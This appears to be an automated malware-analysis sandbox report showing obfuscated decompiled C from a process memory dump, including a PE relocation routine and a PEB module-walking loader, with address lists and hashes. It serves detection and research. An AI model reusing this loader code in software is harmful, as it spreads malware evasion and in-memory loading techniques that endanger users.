							 *(_t704 - 0x10) = _t692;
							_t594 = _t592 & 0x00000000 | _t692 & 0x00000000 ^  *(_t538 + 0x41c765);
							_t695 =  *(_t704 - 0x10);
							if(_t594 > _t503) {
								_t221 = _t538 + 0x41ce1f; // 0x41ce1f
								 *_t724 = _t221;
								_t223 = _t538 + 0x41c0ad; // 0x41c0ad
								 *_t724 =  *_t724 & 0x00000000;
								 *_t724 =  *_t724 | _t223;
								_t503 =  *((intOrPtr*)(_t538 + 0x41f064))(_t704,  *(_t704 - 0x14));
							}
							 *_t724 = _t631;
							 *(_t538 + 0x41c497) = 0 ^ _t503;
							_t634 = 0;
							 *_t724 = _t653;
							_t654 = _t695;
							_t696 = _t654 +  *(_t704 + 8);
							_t656 = 0;
							_t227 = _t538 + 0x41d159; // 0x41d159
							 *(_t704 - 0x14) =  *(_t704 - 0x14) & 0x00000000;
							 *_t724 =  *_t724 ^ _t227;
							_t231 = _t538 + 0x41d213; // 0x41d213
							 *(_t704 - 0x10) = 0;
							 *_t724 =  *_t724 + _t231;
							_t506 =  *((intOrPtr*)(_t538 + 0x41f068))( *(_t704 - 0x10),  *(_t704 - 0x14));
							 *(_t704 - 0x14) = _t696;
							 *(_t538 + 0x41d182) =  *(_t538 + 0x41d182) & 0x00000000;
							 *(_t538 + 0x41d182) =  *(_t538 + 0x41d182) ^ (_t696 ^  *(_t704 - 0x14) | _t506);
							_t577 = _t594;
							_t242 = _t538 + 0x41c85c; // 0x41c85c
							 *_t724 =  *_t724 & 0x00000000;
							 *_t724 =  *_t724 | _t242;
							_t243 = _t538 + 0x41c10e; // 0x41c10e
							 *_t724 = _t243;
							_t509 =  *((intOrPtr*)(_t538 + 0x41f068))( *(_t704 - 0x14), _t634);
							 *(_t538 + 0x41ce00) =  *(_t538 + 0x41ce00) & 0x00000000;
							 *(_t538 + 0x41ce00) =  *(_t538 + 0x41ce00) | _t634 & 0x00000000 | _t509;
							_t637 = _t634;
							_push( *(_t704 - 0x14) + 2);
							_pop( *_t250);
							_push( *(_t704 - 0x14));
							_pop( *_t252);
							_t253 = _t538 + 0x41c9a3; // 0x41c9a3
							 *(_t704 - 0x14) =  *(_t704 - 0x14) & 0x00000000;
							 *_t724 =  *_t724 ^ _t253;
							_t257 = _t538 + 0x41d1fa; // 0x41d1fa
							 *_t724 = _t257;
							_t512 =  *((intOrPtr*)(_t538 + 0x41f068))( *(_t704 - 0x14),  *(_t704 - 0x14));
							 *_t724 = _t637;
							 *((intOrPtr*)(_t538 + 0x41d0fe)) = _t512;
							_t622 = 0;
							_t675 = 0 ^  *_t724;
							_t721 =  &(_t724[1]);
							_t261 = _t538 + 0x41d0af; // 0x41d0af
							 *_t721 =  *_t721 & 0x00000000;
							 *_t721 =  *_t721 | _t261;
							_t262 = _t538 + 0x41ceae; // 0x41ceae
							 *_t721 = _t262;
							_t459 =  *((intOrPtr*)(_t538 + 0x41f068))( *(_t704 - 0x10), _t577);
							 *(_t704 - 0x10) = _t656;
							 *(_t538 + 0x41c8cd) =  *(_t538 + 0x41c8cd) & 0x00000000;
							 *(_t538 + 0x41c8cd) =  *(_t538 + 0x41c8cd) ^ _t656 -  *(_t704 - 0x10) ^ _t459;
							_t645 =  *(_t704 - 0x10);
						}
						 *(_t704 - 0x10) = _t540;
						_t543 =  *(_t704 - 0x10);
						_t299 = _t543 + 0x41cb0b; // 0x41cb0b
						 *(_t704 - 0x14) = 0;
						 *_t721 =  *_t721 | _t299;
						_t463 =  *((intOrPtr*)(_t543 + 0x41f060))( *(_t704 - 0x14));
						 *_t721 = _t463;
						_t304 = _t543 + 0x41cda5; // 0x41cda5
						 *_t721 = _t304;
						_t465 =  *((intOrPtr*)(_t543 + 0x41f060))( *(_t704 - 0x14),  *(_t704 - 0x10));
						_t722 = _t721 - 0xfffffffc;
						 *_t722 =  *_t722 ^ _t704;
						_t705 = _t465;
						_t466 = _t705 +  *_t721;
						_t707 = 0;
						 *(_t707 - 0x14) = _t675;
						_t580 =  *(_t543 + 0x41c96a);
						_t678 =  *(_t707 - 0x14);
						if(_t580 > _t466) {
							_t310 = _t543 + 0x41cb0b; // 0x41cb0b
							 *_t722 =  *_t722 & 0x00000000;
							 *_t722 =  *_t722 | _t310;
							_t311 = _t543 + 0x41cda5; // 0x41cda5
							 *(_t707 - 0x14) =  *(_t707 - 0x14) & 0x00000000;
							 *_t722 =  *_t722 | _t311;
							_t466 =  *((intOrPtr*)(_t543 + 0x41f064))( *(_t707 - 0x14), _t707);
						}
						 *_t316 = _t466;
						 *_t318 =  *(_t707 - 0x10);
						_t722[1] =  *(_t707 - 0xc);
						_t545 = _t543;
						_t321 = _t545 + 0x41cee2; // 0x41cee2
						 *_t722 = _t321;
						_t323 = _t545 + 0x41d33a; // 0x41d33a
						 *(_t707 - 0x14) = 0;
						 *_t722 =  *_t722 | _t323;
						_t469 =  *((intOrPtr*)(_t545 + 0x41f068))( *(_t707 - 0x14),  *(_t707 - 0x10), _t580);
						 *(_t545 + 0x41d1da) =  *(_t545 + 0x41d1da) & 0x00000000;
						 *(_t545 + 0x41d1da) =  *(_t545 + 0x41d1da) | _t678 -  *_t722 | _t469;
						_t681 = _t678;
						 *(_t707 - 0x10) = _t645;
						_t648 =  *(_t707 - 0x10);
						 *_t722 =  *_t722 - _t622;
						 *_t722 =  *_t722 ^ (_t469 & 0x00000000 | _t645 ^  *(_t707 - 0x10) |  *(_t707 - 4));
						_t335 = _t545 + 0x41d2b3; // 0x41d2b3
						 *_t722 =  *_t722 - _t622;
						 *_t722 = _t335;
						_t336 = _t545 + 0x41cb87; // 0x41cb87
						 *(_t707 - 0x10) =  *(_t707 - 0x10) & 0x00000000;
						 *_t722 =  *_t722 + _t336;
						_t474 =  *((intOrPtr*)(_t545 + 0x41f068))( *(_t707 - 0x10), _t622, _t622);
						 *(_t707 - 0x10) = _t580;
						 *(_t545 + 0x41cf9a) =  *(_t545 + 0x41cf9a) & 0x00000000;
						 *(_t545 + 0x41cf9a) =  *(_t545 + 0x41cf9a) | _t580 ^  *(_t707 - 0x10) | _t474;
						_t583 =  *(_t707 - 0x10);
						_t723 =  &(_t722[1]);
						 *(_t707 - 0x10) = 0;
						 *_t723 =  *_t723 ^  *_t722;
						_t350 = _t545 + 0x41c922; // 0x41c922
						 *(_t707 - 0x10) = 0;
						 *_t723 =  *_t723 | _t350;
						_t353 = _t545 + 0x41c97d; // 0x41c97d
						 *_t723 =  *_t723 & 0x00000000;
						 *_t723 =  *_t723 + _t353;
						_t479 =  *((intOrPtr*)(_t545 + 0x41f068))(_t583,  *(_t707 - 0x10),  *(_t707 - 0x10));
						 *(_t545 + 0x41cae1) =  *(_t545 + 0x41cae1) & 0x00000000;
						 *(_t545 + 0x41cae1) =  *(_t545 + 0x41cae1) | _t707 & 0x00000000 | _t479;
						_t704 = _t707;
						_t480 =  *((intOrPtr*)(_t545 + 0x41f050))();
						 *(_t704 - 0x14) = 0;
						 *_t723 =  *_t723 + _t480;
						_t362 = _t545 + 0x41c197; // 0x41c197
						 *(_t704 - 0x14) = 0;
						 *_t723 =  *_t723 | _t362;
						_t482 =  *((intOrPtr*)(_t545 + 0x41f060))( *(_t704 - 0x14),  *(_t704 - 0x14));
						 *(_t704 - 0x14) = 0;
						 *_t723 =  *_t723 | _t482;
						_t368 = _t545 + 0x41c46f; // 0x41c46f
						 *(_t704 - 0x14) = 0;
						 *_t723 =  *_t723 ^ _t368;
						_t484 =  *((intOrPtr*)(_t545 + 0x41f060))( *(_t704 - 0x14),  *(_t704 - 0x14));
						_pop( *_t372);
						_t585 = (_t583 & 0x00000000) +  *(_t704 - 0x10);
						 *_t374 = _t484;
						 *(_t704 - 0x14) =  *(_t704 - 0x14) + _t585;
						_push( *(_t704 - 0x14));
						_pop(_t485);
						_t547 = _t545;
						 *(_t704 - 0x10) = _t648;
						_t574 = _t585 & 0x00000000 ^ _t648 -  *(_t704 - 0x10) ^  *(_t547 + 0x41c9d0);
						_t645 =  *(_t704 - 0x10);
						if(_t574 > _t485) {
							_t382 = _t547 + 0x41c197; // 0x41c197
							 *_t723 =  *_t723 & 0x00000000;
							 *_t723 =  *_t723 + _t382;
							_t383 = _t547 + 0x41c46f; // 0x41c46f
							 *(_t704 - 0x10) = 0;
							 *_t723 =  *_t723 ^ _t383;
							_t485 =  *((intOrPtr*)(_t547 + 0x41f064))( *(_t704 - 0x10), _t681);
							 *(_t547 + 0x41cfe1) =  *(_t547 + 0x41cfe1) & 0x00000000;
							 *(_t547 + 0x41cfe1) =  *(_t547 + 0x41cfe1) | _t704 ^  *_t723 ^ _t485;
							_t704 = _t704;
						}
						_t721 =  &(_t723[1]);
						 *_t721 =  *_t721 ^ _t704;
						 *_t721 = _t681;
						 *_t721 = _t485 & 0x00000000 |  *_t723;
						_t490 = 0;
						 *_t721 = _t622;
						 *((intOrPtr*)( *((intOrPtr*)(_t704 - 8)))) = _t490;
						_t625 = 0;
						 *_t392 = _t704;
						 *_t721 = 4;
						_t491 = _t547;
						 *_t394 = 0 ^  *(_t704 - 0x14);
						 *(_t704 - 0x14) =  *(_t704 - 0x14) + _t491;
						_t675 =  *(_t704 - 0x14);
						_t616 = _t625;
						 *_t399 =  *((intOrPtr*)(_t704 - 8));
						 *(_t704 - 0x10) =  *(_t704 - 0x10) + _t491;
						 *_t403 =  *(_t704 - 0x10);
						_t538 = _t547;
						if( *_t675 != 0) {
							goto L9;
						}
						goto L21;
					}
				}
			}

0x03335a25
0x03335a25
0x03335a25
0x03335a2b
0x03335a2c
0x03335a30
0x03335a33
0x03335a39
0x03335a40
0x03335a46
0x03335a49
0x03335a49
0x03335a4d
0x03335a51
0x03335a59
0x03335a5c
0x03335a5f
0x03335a67
0x03335a6e
0x03335a74
0x03335a75
0x03335a7f
0x03335a83
0x03335a8d
0x03335a91
0x03335a94
0x03335a9a
0x03335aa1
0x03335aa7
0x03335aaa
0x03335ab8
0x03335abb
0x03335ac5
0x03335ac9
0x03335acc
0x03335ad2
0x03335ada
0x03335ae1
0x03335ae7
0x03335aea
0x03335aea
0x03335af8
0x03335afb
0x03335b01
0x03335b0b
0x03335b0e
0x03335b17
0x03335b1a
0x03335b23
0x03335b26
0x03335b35
0x03335b3a
0x03335b3e
0x03335b41
0x03335b43
0x03335b44
0x03335b4f
0x03335b51
0x03335b56
0x03335b58
0x03335b5f
0x03335b63
0x03335b66
0x03335b6c
0x03335b73
0x03335b76
0x03335b76
0x03335b7d
0x03335b83
0x03335b8e
0x03335b92
0x03335b93
0x03335b9c
0x03335b9f
0x03335ba5
0x03335baf
0x03335bb2
0x03335bbe
0x03335bc5
0x03335bcb
0x03335bcc
0x03335bda
0x03335bde
0x03335be1
0x03335be4
0x03335beb
0x03335bee
0x03335bf1
0x03335bf7
0x03335bfe
0x03335c01
0x03335c07
0x03335c0f
0x03335c16
0x03335c1c
0x03335c28
0x03335c2b
0x03335c35
0x03335c38
0x03335c3e
0x03335c48
0x03335c4b
0x03335c52
0x03335c56
0x03335c59
0x03335c65
0x03335c6c
0x03335c72
0x03335c73
0x03335c79
0x03335c83
0x03335c86
0x03335c8c
0x03335c96
0x03335c99
0x03335c9f
0x03335ca9
0x03335cac
0x03335cb2
0x03335cbc
0x03335cbf
0x03335ccb
0x03335cce
0x03335cd5
0x03335cd8
0x03335cdb
0x03335cde
0x03335cdf
0x03335ce0
0x03335cef
0x03335cf1
0x03335cf6
0x03335cf8
0x03335cff
0x03335d03
0x03335d06
0x03335d0c
0x03335d16
0x03335d19
0x03335d25
0x03335d2c
0x03335d32
0x03335d32
0x03335d3c
0x03335d40
0x03335d43
0x03335d48
0x03335d52
0x03335d55
0x03335d5c
0x03335d5e
0x03335d61
0x03335d68
0x03335d6f
0x03335d74
0x03335d77
0x03335d7d
0x03335d7e
0x03335d85
0x03335d88
0x03335d8e
0x03335d91
0x03335d95
0x00000000
0x00000000
0x03335d9b
0x03335da4
0x03335da6
0x03335daa
0x03335314
0x03335405
0x0333540b
0x0333540c
0x03335413
0x03335417
0x0333541a
0x03335421
0x03335424
0x03335427
0x03335433
0x0333543a
0x03335440
0x0333531a
0x0333531a
0x03335320
0x0333532a
0x0333532d
0x03335333
0x0333533a
0x03335343
0x03335346
0x03335349
0x0333534c
0x0333534d
0x03335356
0x03335359
0x03335365
0x0333536c
0x03335372
0x03335372
0x03335445
0x03335445
0x03335448
0x0333544f
0x03335452
0x03335455
0x0333545d
0x03335464
0x0333546a
0x0333546b
0x0333546e
0x03335477
0x0333547a
0x03335480
0x03335487
0x0333548a
0x03335491
0x03335495
0x03335498
0x033354a0
0x033354a3
0x033354aa
0x033354ad
0x033354b0
0x033354b3
0x033354b4
0x033354b5
0x033354c4
0x033354c6
0x033354cb
0x033354cd
0x033354d6
0x033354d9
0x033354df
0x033354e6
0x033354e9
0x033354e9
0x033354ef
0x033354f7
0x033354fe
0x03335504
0x03335507
0x03335515
0x03335519
0x0333551d
0x03335520
0x03335527
0x0333552b
0x0333552e
0x03335535
0x03335539
0x0333553c
0x03335542
0x0333554a
0x03335551
0x03335557
0x0333555a
0x03335562
0x03335565
0x03335568
0x0333556b
0x0333556e
0x0333556f
0x03335576
0x03335579
0x0333557c
0x03335582
0x0333558c
0x03335595
0x03335596
0x03335599
0x0333559c
0x033355a2
0x033355a5
0x033355a8
0x033355ab
0x033355ad
0x033355b1
0x033355b4
0x033355bb
0x033355be
0x033355c1
0x033355c7
0x033355cf
0x033355d6
0x033355dc
0x033355e8
0x033355eb
0x033355ed
0x033355f0
0x033355f1
0x033355fb
0x033355fe
0x03335607
0x0333560a
0x03335611
0x03335614
0x03335617
0x0333561d
0x03335624
0x03335627
0x0333562f
0x03335632
0x03335635
0x0333563c
0x0333563d
0x03335640
0x0333564e
0x03335650
0x03335653
0x03335655
0x0333565b
0x03335662
0x03335665
0x0333566b
0x03335675
0x03335678
0x0333567e
0x03335685
0x0333568b
0x0333568b
0x03335694
0x0333569c
0x033356a0
0x033356a4
0x033356a6
0x033356a8
0x033356ac
0x033356af
0x033356b8
0x033356bb
0x033356c2
0x033356c6
0x033356c9
0x033356cf
0x033356d6
0x033356dc
0x033356e1
0x033356e4
0x033356e8
0x033356eb
0x033356ee
0x033356f4
0x033356fe
0x03335701
0x03335707
0x0333570f
0x03335716
0x0333571f
0x03335725
0x0333572f
0x03335732
0x03335738
0x03335742
0x03335745
0x0333574b
0x03335753
0x0333575a
0x03335760
0x0333576c
0x0333576f
0x03335777
0x0333577b
0x0333577e
0x03335781
0x0333578a
0x0333578d
0x03335794
0x03335797
0x0333579a
0x033357a0
0x033357a7
0x033357ad
0x00000000
0x033357ad
0x03335dbb
0x03335dbe
0x03335dd0
0x033357b0
0x033357b6
0x00000000
0x033357bc
0x033357bc
0x033357c3
0x033357c6
0x033357c9
0x033357cf
0x033357d9
0x033357dc
0x033357e3
0x033357e6
0x033357e9
0x033357f5
0x033357f8
0x033357fd
0x03335801
0x03335804
0x03335806
0x03335807
0x03335816
0x03335818
0x0333581d
0x0333581f
0x03335826
0x0333582a
0x0333582d
0x03335836
0x03335839
0x03335839
0x03335845
0x0333584c
0x03335852
0x03335854
0x03335858
0x0333585b
0x03335864
0x0333586d
0x0333586e
0x03335871
0x03335874
0x0333587a
0x0333587c
0x03335883
0x03335887
0x0333588a
0x03335890
0x0333589a
0x0333589d
0x033358a3
0x033358aa
0x033358ad
0x033358b9
0x033358bc
0x033358c3
0x033358c6
0x033358c9
0x033358cc
0x033358cd
0x033358ce
0x033358dd
0x033358df
0x033358e4
0x033358e6
0x033358ef
0x033358f2
0x033358f9
0x033358fd
0x03335900
0x03335900
0x03335908
0x0333590f
0x03335915
0x03335918
0x0333591c
0x03335920
0x03335922
0x03335923
0x03335929
0x03335930
0x03335933
0x03335939
0x03335943
0x03335946
0x0333594c
0x03335954
0x0333595b
0x0333596f
0x03335970
0x03335977
0x0333597b
0x0333597e
0x03335987
0x0333598a
0x03335996
0x0333599d
0x033359a3
0x033359a4
0x033359a5
0x033359a8
0x033359ab
0x033359ae
0x033359b4
0x033359bb
0x033359be
0x033359c7
0x033359ca
0x033359d2
0x033359d9
0x033359df
0x033359e2
0x033359e5
0x033359e8
0x033359ef
0x033359f3
0x033359f6
0x033359ff
0x03335a02
0x03335a08
0x03335a10
0x03335a17
0x03335a1d
0x03335a1d
0x03335aea
0x03335af8
0x03335afb
0x03335b01
0x03335b0b
0x03335b0e
0x03335b17
0x03335b1a
0x03335b23
0x03335b26
0x03335b35
0x03335b3a
0x03335b3e
0x03335b41
0x03335b43
0x03335b44
0x03335b4f
0x03335b51
0x03335b56
0x03335b58
0x03335b5f
0x03335b63
0x03335b66
0x03335b6c
0x03335b73
0x03335b76
0x03335b76
0x03335b7d
0x03335b83
0x03335b8e
0x03335b92
0x03335b93
0x03335b9c
0x03335b9f
0x03335ba5
0x03335baf
0x03335bb2
0x03335bbe
0x03335bc5
0x03335bcb
0x03335bcc
0x03335bda
0x03335bde
0x03335be1
0x03335be4
0x03335beb
0x03335bee
0x03335bf1
0x03335bf7
0x03335bfe
0x03335c01
0x03335c07
0x03335c0f
0x03335c16
0x03335c1c
0x03335c28
0x03335c2b
0x03335c35
0x03335c38
0x03335c3e
0x03335c48
0x03335c4b
0x03335c52
0x03335c56
0x03335c59
0x03335c65
0x03335c6c
0x03335c72
0x03335c73
0x03335c79
0x03335c83
0x03335c86
0x03335c8c
0x03335c96
0x03335c99
0x03335c9f
0x03335ca9
0x03335cac
0x03335cb2
0x03335cbc
0x03335cbf
0x03335ccb
0x03335cce
0x03335cd5
0x03335cd8
0x03335cdb
0x03335cde
0x03335cdf
0x03335ce0
0x03335cef
0x03335cf1
0x03335cf6
0x03335cf8
0x03335cff
0x03335d03
0x03335d06
0x03335d0c
0x03335d16
0x03335d19
0x03335d25
0x03335d2c
0x03335d32
0x03335d32
0x03335d3c
0x03335d40
0x03335d43
0x03335d48
0x03335d52
0x03335d55
0x03335d5c
0x03335d5e
0x03335d61
0x03335d68
0x03335d6f
0x03335d74
0x03335d77
0x03335d7d
0x03335d7e
0x03335d85
0x03335d88
0x03335d8e
0x03335d91
0x03335d95
0x00000000
0x00000000
0x00000000
0x03335d95
0x03335aea

Memory Dump Source

Source File: 00000002.00000002.275244228.0000000003330000.00000040.00000001.sdmp, Offset: 03330000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b22095e20c329f7d375c50b2b4e61b093e339a4e4c2e62bd3b86910ad18266d0
Instruction ID: a2fc30a1ebd90bda2bd8f1de16561ec638d21c1d3a28516b8dc2dacea784caf1
Opcode Fuzzy Hash: b22095e20c329f7d375c50b2b4e61b093e339a4e4c2e62bd3b86910ad18266d0
Instruction Fuzzy Hash: 13C12472844219DFEF04DFA0C8897EEBBF5FF08310F15486DD989AA145D3742664CBAA

Uniqueness

Uniqueness Score: -1.00%

Function 03332FAF, Relevance: .2, Instructions: 210
COMMONCrypto

Download Yara Rule

C-Code - Quality: 76%

			E03332FAF(void* __eax, signed int __ebx, signed int __ecx, signed int __edx, signed int __edi, void* __esi, signed int _a4) {
				char _v2;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _t60;
				signed int _t62;
				void* _t63;
				void* _t64;
				signed int _t65;
				signed int _t68;
				signed int _t74;
				void* _t77;
				signed int _t80;
				void* _t81;
				void* _t83;
				void* _t86;
				void* _t90;
				void* _t92;
				void* _t93;
				void* _t95;
				signed int _t98;
				signed int _t102;
				signed int _t103;
				signed int _t105;
				signed int _t107;
				signed int _t108;
				signed int _t109;
				signed int _t111;
				signed int _t114;
				void* _t117;
				signed int _t120;
				signed int _t127;
				void* _t128;
				signed int _t130;
				signed int _t133;
				signed int _t140;
				signed int _t143;
				signed int _t145;
				void* _t148;
				signed int _t150;
				signed int _t151;
				signed int _t154;
				signed int _t156;
				void* _t161;
				signed int _t163;
				signed int _t164;
				void* _t167;
				signed int _t169;
				void* _t170;
				signed int* _t173;

				_t114 = __edx;
				_v16 = 0;
				_push(_v16);
				 *_t173 =  *_t173 + __esi;
				_v16 = _v16 & 0x00000000;
				_push(_v16);
				 *_t173 =  *_t173 | __edi;
				_push(__esi);
				_t140 =  *_t173;
				 *_t173 =  *(__ebx + 0x41c166);
				_pop( *_t8);
				_v16 = __ebx;
				_t74 = _v16;
				_t163 = _a4 | _a4;
				_t127 = _t163;
				_t164 = _t161;
				if(_t163 != 0) {
					 *_t173 = __ecx;
					_t90 = _t127;
					_t128 = _t90 +  *((intOrPtr*)(_t127 + 0x3c));
					_t92 = 0;
					 *_t14 =  *((intOrPtr*)(_t128 + 0x34));
					_push(_v16);
					_pop(_t60);
					_v12 = _v12 - _t60;
					_t77 = _t74;
					_v16 = _t140;
					_v8 = _v8 & 0x00000000;
					_v8 = _v8 | _t140 & 0x00000000 ^ _t60;
					_t143 = _v16;
					 *_t173 =  *_t173 + _t92;
					_t93 = _t128;
					_t95 = 0;
					_t130 = _t93 + ( *(_t128 + 0x14) & 0x0000ffff) + 0xffffffc0;
					_t98 = _t95;
					 *_t173 = _t164;
					_t62 =  *_t130;
					_t167 = 0;
					 *_t173 =  *_t173 | _t62;
					_t63 = _t62;
					if( *_t173 != 0) {
						_t80 = _t77;
						 *_t27 = _t63;
						_v16 = _v16 + _v12;
						_push(_v16);
						_pop(_t64);
						_t145 = _t143;
						_push(_t98 & 0x00000000 ^ (_t77 -  *_t173 |  *(_t130 + 4)));
						 *_t32 = _t64;
						_v16 = _v16 + _v8;
						_push(_v16);
						_pop(_t65);
						_pop(_t102);
						_t133 = _t130;
						_v16 = _t65;
						_push(_v12 + (_t145 & 0x00000000 | _t130 & 0x00000000 ^ _v8));
						_t68 = _v16;
						_pop(_t148);
						while(1) {
							_t150 = _t102 | _t102;
							_t103 = _t150;
							_t151 = _t148;
							if(_t150 == 0) {
								goto L12;
							}
							_t117 = _t114;
							 *_t173 =  *_t173 ^ _t80;
							_push(_t133 & 0x00000000 | _t114 & 0x00000000 |  *_t68);
							_pop(_t81);
							_t133 = _t81 + _t151;
							_t83 = 0;
							_v16 = _v16 & 0x00000000;
							_push(_v16);
							 *_t173 =  *_t173 | _t103;
							_v16 = _t151;
							_t105 = _t103 & 0x00000000 | _t151 - _v16 ^  *(_t68 + 4);
							_t154 = _v16;
							_v16 = 0;
							_push(_v16);
							 *_t173 =  *_t173 + _t105;
							_t86 = _t83;
							_t107 = _t105 + 0xfffffff8 >> 1;
							_t68 = _t68 + 8;
							_t120 = _t117;
							while(1) {
								_t156 = _t107 | _t107;
								_t108 = _t156;
								_t154 = _t154;
								if(_t156 == 0) {
									break;
								}
								_v16 = 0;
								_push(_v16);
								 *_t173 =  *_t173 | _t108;
								 *_t173 = 0xf000;
								_t109 = _t133;
								_t111 = 0 ^  *_t173;
								_t173 =  &(_t173[1]);
								_t169 =  *_t68 & 0x0000ffff & _t109 |  *_t68 & 0x0000ffff & _t109;
								_t120 = _t169;
								_t170 = _t167;
								if(_t169 != 0) {
									_t120 =  *_t68 & 0xfff;
									_push(_v16);
									 *_t173 = _t68;
									_t154 = _t154;
									 *((intOrPtr*)(_t120 + _t133)) =  *((intOrPtr*)(_t120 + _t133)) + (_t68 & 0x00000000 | _t154 & 0x00000000 | _v12);
									_pop( *_t55);
									_t68 = _v16;
								}
								_t68 =  &_v2;
								_t167 = _t170;
								_t107 = _t111 - 1;
							}
							_t114 = _t120 & 0x00000000 ^  *_t173;
							_t173 =  &(_t173[1]);
							_pop( *_t57);
							_t102 = (_t108 & 0x00000000 ^ _v16) - _t114;
							_t80 = _t86;
						}
					} else {
					}
				} else {
				}
				L12:
				return _t68;
			}

0x03332faf
0x03332fb5
0x03332fbc
0x03332fbf
0x03332fc2
0x03332fc6
0x03332fc9
0x03332fcc
0x03332fd3
0x03332fd3
0x03332fd6
0x03332fd9
0x03332fe3
0x03332fe9
0x03332feb
0x03332fed
0x03332fee
0x03332ff7
0x03332ffb
0x03332fff
0x03333001
0x03333005
0x03333008
0x0333300b
0x03333012
0x03333015
0x03333016
0x0333301e
0x03333022
0x03333025
0x0333302e
0x03333032
0x03333037
0x03333041
0x03333043
0x03333046
0x0333304d
0x0333304f
0x03333051
0x03333054
0x03333055
0x03333068
0x0333306e
0x03333071
0x03333074
0x03333077
0x03333078
0x03333079
0x0333307e
0x03333081
0x03333084
0x03333087
0x03333088
0x03333095
0x03333096
0x0333309e
0x0333309f
0x033330a2
0x0333318d
0x03333190
0x03333192
0x03333194
0x03333195
0x00000000
0x00000000
0x033330b3
0x033330b6
0x033330b9
0x033330ba
0x033330bd
0x033330bf
0x033330c0
0x033330c4
0x033330c7
0x033330ca
0x033330d6
0x033330d8
0x033330db
0x033330e2
0x033330e5
0x033330f3
0x033330f4
0x033330ff
0x03333101
0x03333163
0x03333166
0x03333168
0x0333316a
0x0333316b
0x00000000
0x00000000
0x03333107
0x0333310e
0x03333111
0x03333115
0x0333311c
0x03333121
0x03333124
0x0333312a
0x0333312c
0x0333312e
0x0333312f
0x03333134
0x0333313a
0x0333313d
0x0333314c
0x0333314d
0x03333150
0x03333153
0x03333153
0x0333315f
0x03333161
0x03333162
0x03333162
0x03333173
0x03333176
0x0333317f
0x0333318a
0x0333318c
0x0333318c
0x00000000
0x03333057
0x00000000
0x03332ff0
0x0333319b
0x033331b0

Memory Dump Source

Source File: 00000002.00000002.275244228.0000000003330000.00000040.00000001.sdmp, Offset: 03330000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d1f32643c1a337532a551df5e7dd1d687da03bae7b11c336c53ee130eebd2aab
Instruction ID: 8348aa61c5019e028228246caa930e438104fa054e5489834c2f9f917d18a0f9
Opcode Fuzzy Hash: d1f32643c1a337532a551df5e7dd1d687da03bae7b11c336c53ee130eebd2aab
Instruction Fuzzy Hash: E6618273E04618AFEB049F99DC857ADFBB5EF44730F15C1AEE595A3280DBB429008B90

Uniqueness

Uniqueness Score: -1.00%

Function 03332A69, Relevance: .2, Instructions: 161
COMMONCrypto

Download Yara Rule

C-Code - Quality: 61%

			E03332A69(signed int __eax, signed int __ebx, signed int __ecx, signed int __edx, signed int __edi, signed int __esi) {
				intOrPtr _v8;
				signed int _v12;
				signed int _v16;
				signed int _t52;
				signed int _t54;
				signed int _t56;
				intOrPtr _t63;
				signed int _t70;
				signed int _t75;
				signed int _t88;
				signed int _t91;
				signed int _t105;
				signed int _t109;
				signed int _t112;
				signed int _t125;
				void* _t129;
				signed int* _t140;

				_push(_v16);
				 *_t140 = __eax;
				_push(__edi);
				 *_t140 =  *_t140 ^ __edi;
				 *_t140 =  *_t140 ^ __ecx;
				_push(_v12);
				 *_t140 = __edx;
				_push(__ecx);
				 *_t140 =  *_t140 ^ __ecx;
				 *_t140 =  *_t140 + __edi;
				_push(__ecx);
				 *_t140 =  *_t140 - __ecx;
				 *_t140 = __esi;
				if( *((intOrPtr*)(__ebx + 0x41ce4a)) != 1) {
					_v16 = __edx;
					_t103 = 0 ^  *(__ebx + 0x41c3f9);
					_push(__esi);
					_pop(_t125);
					_v16 = _t125;
					_t105 =  *(__ebx + 0x41c166) +  *((intOrPtr*)((__eax & 0x00000000 | __esi & 0x00000000 ^  *((0 ^  *(__ebx + 0x41c3f9)) + 0x3c)) + _t103 + 0x28));
					 *_t17 = _t105;
					_push(_v8);
					_pop(_t88);
					_t107 = _t105 & 0x00000000 | _t88 & 0x00000000 ^  *(__ebx + 0x41c166);
					_t91 = _t88;
					 *_t140 = __ecx;
					_t70 = 0;
					_push(0);
					 *_t140 =  *_t140 ^ _v16;
					_push( *((intOrPtr*)((0 ^  *((_t105 & 0x00000000 | _t88 & 0x00000000 ^  *(__ebx + 0x41c166)) + 0x3c)) + _t107 + 0x28)));
					_pop(_t129);
					_t109 = _t129 +  *(__ebx + 0x41c166);
					_v12 = _t70;
					_t52 = 0 ^ _t109;
					 *_t140 = _t109;
					_t112 = 0;
					_push(__ebx);
					_t75 = _v12 & 0x00000000 ^ __ebx & 0x00000000 ^  *( *((intOrPtr*)((0 ^  *[fs:0x30]) + 0xc)) + 0xc);
					__eflags = _t75;
					_pop(_t63);
					while(1) {
						_t112 = _t112 & 0x00000000 ^ _t91 ^  *_t140 ^  *(_t75 + 0x1c);
						_t91 = _t91;
						__eflags = _t52 - _t112;
						if(_t52 == _t112) {
							break;
						}
						__eflags = _t91 - _t112;
						if(__eflags != 0) {
							_t75 =  *(_t75 + 4);
							if(__eflags != 0) {
								continue;
							} else {
								 *((intOrPtr*)(_t63 + 0x41ce4a)) = 1;
								_pop( *_t42);
								_pop( *_t44);
								_pop( *_t46);
								_t54 = _t52 & 0x00000000 ^ _t140[1];
								__eflags = _t54;
								return _t54;
							}
						} else {
							_pop( *_t36);
							_pop( *_t38);
							_t56 = _t52 & 0x00000000 |  *(_t140 - 0xfffffffc + 4);
							__eflags = _t56;
							return _t56;
						}
						goto L9;
					}
					_v8 = _t63;
					 *(_t75 + 0x1c) = _t91;
					_pop( *_t32);
					__eflags = 0 ^ _t140[2];
					_pop( *_t34);
					return _v8;
				} else {
					_pop( *_t4);
					_pop( *_t6);
					return  *((intOrPtr*)( &(_t140[1]) - 0xfffffffc));
				}
				L9:
			}

0x03332a6f
0x03332a72
0x03332a75
0x03332a76
0x03332a79
0x03332a7c
0x03332a7f
0x03332a82
0x03332a83
0x03332a86
0x03332a89
0x03332a8a
0x03332a8d
0x03332a97
0x03332ac9
0x03332ad4
0x03332ad9
0x03332ae5
0x03332aea
0x03332af9
0x03332afb
0x03332afe
0x03332b01
0x03332b0f
0x03332b11
0x03332b14
0x03332b1e
0x03332b23
0x03332b25
0x03332b28
0x03332b29
0x03332b30
0x03332b33
0x03332b3a
0x03332b41
0x03332b4f
0x03332b53
0x03332b5d
0x03332b5d
0x03332b5f
0x03332b60
